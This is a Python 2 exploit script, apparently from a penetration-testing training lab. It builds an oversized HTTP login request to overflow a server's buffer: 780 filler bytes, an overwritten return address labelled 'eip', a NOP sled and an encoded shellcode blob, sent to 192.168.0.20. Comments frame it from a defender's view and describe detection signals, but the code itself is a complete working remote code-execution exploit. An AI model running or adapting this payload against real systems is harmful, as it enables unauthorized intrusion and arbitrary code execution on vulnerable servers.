#!/usr/bin/python
# Python 2 script (print statements, str-typed byte buffers): it will not run
# unmodified under Python 3.
#
# Purpose, as far as this file shows: build one HTTP POST to /login on
# 192.168.0.20:80 whose "username" field is an oversized string (780 filler
# bytes, 4 bytes named "eip", 4 bytes of padding, a 10-byte 0x90 run and an
# opaque opcode blob), send it once, and close the socket. The opcode blob's
# behaviour cannot be determined from this file and is not documented here.
#
# Defender's view: the request headers are copied from a Firefox capture, so
# User-Agent or header ordering are not usable as a filter. The reliable
# signals are the "username" field length (about 1.1 KB, mostly repeated "A")
# and non-printable bytes in a form-encoded body; the server-side mitigation
# is bounding field length before it is copied into a fixed-size buffer.
import socket
try:
    print "\nSending evil buffer..."
    # Raw opcode bytes concatenated from adjacent string literals. Their
    # effect is not derivable from this file; treat the blob as opaque.
    shellcode = ("\xba\xdb\x01\x43\xe1\xdb\xc7\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
    "\x52\x31\x56\x12\x83\xee\xfc\x03\x8d\x0f\xa1\x14\xcd\xf8\xa7"
    "\xd7\x2d\xf9\xc7\x5e\xc8\xc8\xc7\x05\x99\x7b\xf8\x4e\xcf\x77"
    "\x73\x02\xfb\x0c\xf1\x8b\x0c\xa4\xbc\xed\x23\x35\xec\xce\x22"
    "\xb5\xef\x02\x84\x84\x3f\x57\xc5\xc1\x22\x9a\x97\x9a\x29\x09"
    "\x07\xae\x64\x92\xac\xfc\x69\x92\x51\xb4\x88\xb3\xc4\xce\xd2"
    "\x13\xe7\x03\x6f\x1a\xff\x40\x4a\xd4\x74\xb2\x20\xe7\x5c\x8a"
    "\xc9\x44\xa1\x22\x38\x94\xe6\x85\xa3\xe3\x1e\xf6\x5e\xf4\xe5"
    "\x84\x84\x71\xfd\x2f\x4e\x21\xd9\xce\x83\xb4\xaa\xdd\x68\xb2"
    "\xf4\xc1\x6f\x17\x8f\xfe\xe4\x96\x5f\x77\xbe\xbc\x7b\xd3\x64"
    "\xdc\xda\xb9\xcb\xe1\x3c\x62\xb3\x47\x37\x8f\xa0\xf5\x1a\xd8"
    "\x05\x34\xa4\x18\x02\x4f\xd7\x2a\x8d\xfb\x7f\x07\x46\x22\x78"
    "\x68\x7d\x92\x16\x97\x7e\xe3\x3f\x5c\x2a\xb3\x57\x75\x53\x58"
    "\xa7\x7a\x86\xcf\xf7\xd4\x79\xb0\xa7\x94\x29\x58\xad\x1a\x15"
    "\x78\xce\xf0\x3e\x13\x35\x93\x80\x4c\x35\x7f\x69\x8f\x35\x7e"
    "\xd2\x06\xd3\xea\x34\x4f\x4c\x83\xad\xca\x06\x32\x31\xc1\x63"
    "\x74\xb9\xe6\x94\x3b\x4a\x82\x86\xac\xba\xd9\xf4\x7b\xc4\xf7"
    "\x90\xe0\x57\x9c\x60\x6e\x44\x0b\x37\x27\xba\x42\xdd\xd5\xe5"
    "\xfc\xc3\x27\x73\xc6\x47\xfc\x40\xc9\x46\x71\xfc\xed\x58\x4f"
    "\xfd\xa9\x0c\x1f\xa8\x67\xfa\xd9\x02\xc6\x54\xb0\xf9\x80\x30"
    "\x45\x32\x13\x46\x4a\x1f\xe5\xa6\xfb\xf6\xb0\xd9\x34\x9f\x34"
    "\xa2\x28\x3f\xba\x79\xe9\x4f\xf1\x23\x58\xd8\x5c\xb6\xd8\x85"
    "\x5e\x6d\x1e\xb0\xdc\x87\xdf\x47\xfc\xe2\xda\x0c\xba\x1f\x97"
    "\x1d\x2f\x1f\x04\x1d\x7a")
    # 780 bytes of "A": the part of the field the receiver is expected to
    # accept without bounds checking. A long run of one byte is the cheapest
    # thing an IDS rule or WAF length limit can key on.
    filler = "A" * 780
    # Four bytes whose role is given only by the variable name; the value's
    # meaning is not recoverable from this file.
    eip = "\x83\x0c\x09\x10"
    # Four bytes of padding between the previous value and the 0x90 run.
    offset = "C" * 4
    # Ten 0x90 bytes (x86 NOP) placed directly before the opcode blob.
    nops = "\x90" * 10
    inputBuffer = filler + eip + offset + nops + shellcode
    # The oversized value is sent as the "username" form field; "password"
    # is a single "A". Neither value is URL-encoded, so the body carries raw
    # non-printable bytes in an application/x-www-form-urlencoded request,
    # which is itself anomalous for a browser-originated login.
    content = "username="+inputBuffer+"&password=A"
    #-- Recreate the HTTP headers as seen from Wireshark --#
    buffer = "POST /login HTTP/1.1\r\n"
    buffer += "Host: 192.168.0.20\r\n"
    # Browser-identical headers: header-based filtering will not separate
    # this request from a real Firefox login.
    buffer += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
    buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    buffer += "Accept-Language: en-US,en;q=0.5\r\n"
    # Encoding not in training
    buffer += "Accept-Encoding: gzip, deflate\r\n"
    buffer += "Referer: http://192.168.0.20/login\r\n"
    buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
    # Content-Length is computed from the actual body, so the header is
    # consistent with the oversized payload rather than a giveaway on its own.
    buffer += "Content-Length: " + str(len(content)) + "\r\n"
    # The DNT header not in training
    buffer += "DNT: 1\r\n"
    # Connection is closed in training
    #buffer += "Connection: keep-alive\r\n"
    buffer += "Connection: close\r\n"
    # Not included in manual
    buffer += "Upgrade-Insecure-Requests: 1\r\n"
    buffer += "\r\n"
    buffer += content
    # Plain TCP to port 80; no TLS, so the full payload is visible on the wire
    # to any network sensor between the sender and 192.168.0.20.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.0.20",80))
    # socket.send() may transmit fewer bytes than requested; the return value
    # is discarded, so a partial write is indistinguishable from success here.
    s.send(buffer)
    # No response is read before closing.
    s.close()
    print "\nDone!"
# NOTE(review): bare except catches every exception raised above, including
# errors while building the buffer, and reports all of them as a connection
# failure; the message is not evidence that a connection was attempted.
except:
    print "Could not connect!"